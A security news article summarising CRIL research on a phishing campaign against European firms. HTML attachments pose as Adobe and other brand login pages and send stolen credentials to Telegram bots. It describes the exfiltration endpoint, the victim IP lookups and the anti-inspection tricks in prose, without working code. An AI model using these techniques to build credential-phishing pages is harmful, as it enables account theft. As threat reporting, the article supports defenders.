Telegram-Powered Phishing Campaign Targets European Businesses Using HTML Attachments to Steal Credentials
Ddos 
Researchers from Cyble Research and Intelligence Labs (CRIL) have uncovered a massive, multi-brand phishing campaign that uses HTML email attachments to steal credentials — bypassing traditional URL and domain-based detection systems. The stolen data is exfiltrated directly to attacker-controlled Telegram bots, enabling near-instant credential harvesting without relying on conventional command-and-control servers.
“Attackers distribute HTML attachments through email, successfully bypassing conventional security checks by not using suspicious URLs or hosting on external servers,” CRIL explained. “The embedded HTML files run JavaScript that steals user credentials and sends them directly to attacker-controlled Telegram bots.”
The phishing messages mimic business correspondence such as Request for Quotation (RFQ) or invoice confirmations, enticing recipients to open what appears to be a document attachment. The attached file, however, is a self-contained HTML page designed to resemble a legitimate Adobe login prompt.
When opened, the HTML page loads a blurred invoice background and a fake Adobe sign-in form centered on the screen. Victims are prompted to enter their email address and password — data that is immediately sent to Telegram’s Bot API.
“The page executes JavaScript that reads the field values and constructs a message payload… performing an HTTP POST to https://api.telegram.org/bot<BotToken>/sendMessage with chat_id and text fields containing the harvested credentials,” the researchers explained.
After submission, the page displays an “invalid login” message to avoid suspicion and prevent users from realizing they’ve been compromised.
CRIL analyzed multiple HTML samples from the campaign and identified progressive improvements in obfuscation, encryption, and evasion. One sample implemented AES encryption via the CryptoJS library using hard-coded keys, while another employed a dual-password capture mechanism, asking users to re-enter credentials under the pretense of an incorrect password.
“The sample harvests Email Address and Password, captures IP Address and user-agent, followed by exfiltration to Telegram,” the report stated. “It uses jQuery and external IP services such as api.ipify.org and ip-api.com to capture the IP address of the victims.”
A second, more advanced version utilized native Fetch API and featured anti-forensics defenses to obstruct both victims and analysts from viewing the underlying code.
“The implementation blocks F12, Ctrl+U/S/C/A/X, Ctrl+Shift+I, right-click context menu, text selection, and drag events,” CRIL detailed. “This leads to the prevention of victims and analysts from inspecting code, viewing source, copying content, or extracting assets.”
This obfuscation ensures that even seasoned analysts cannot easily extract bot tokens or decipher the JavaScript, making the campaign harder to detect or disrupt.
The Telegram Bot API serves as the central exfiltration mechanism, replacing traditional web-based control servers. Each malicious HTML sample includes hard-coded bot tokens and chat IDs, transmitting credentials in real time to the attacker’s Telegram account.
CRIL’s analysis uncovered a decentralized network of active bots operated by multiple threat actors, each managing its own set of phishing campaigns.
The researchers also noted evidence of infrastructure reuse across multiple campaigns, with identical bot tokens appearing in different brand-themed phishing templates — for example, one token linked to FedEx-themed samples, and another reused in Adobe and WeTransfer variants.
To maximize legitimacy and regional penetration, the attackers impersonated a wide range of global technology, logistics, and telecommunications brands.
Among the most frequently abused were:
- Adobe, Microsoft, WeTransfer, and DocuSign — to mimic document-sharing workflows.
- FedEx and DHL — for logistics-themed campaigns.
- Telekom Deutschland / T-Mobile and Roundcube — for region-specific phishing lures targeting European users.
In Central Europe — including the Czech Republic, Slovakia, Hungary, and Germany — the phishing emails often mimic legitimate B2B procurement requests, using native-language terminology and authentic formatting.
CRIL’s telemetry suggests that dozens of unique HTML samples are in circulation, pointing to an automated phishing toolkit that allows attackers to generate new variants quickly.
CRIL confirmed that the operation primarily targets Central and Eastern Europe, but also extends to the energy, manufacturing, telecommunications, and government sectors.
“A sophisticated credential-harvesting attack that is also scalable poses a potent threat,” CRIL warned. “Impersonating trusted brands, targeting specific audiences, and using Telegram for data exfiltration pose a low-cost yet high-impact threat to organizations worldwide.”
Donate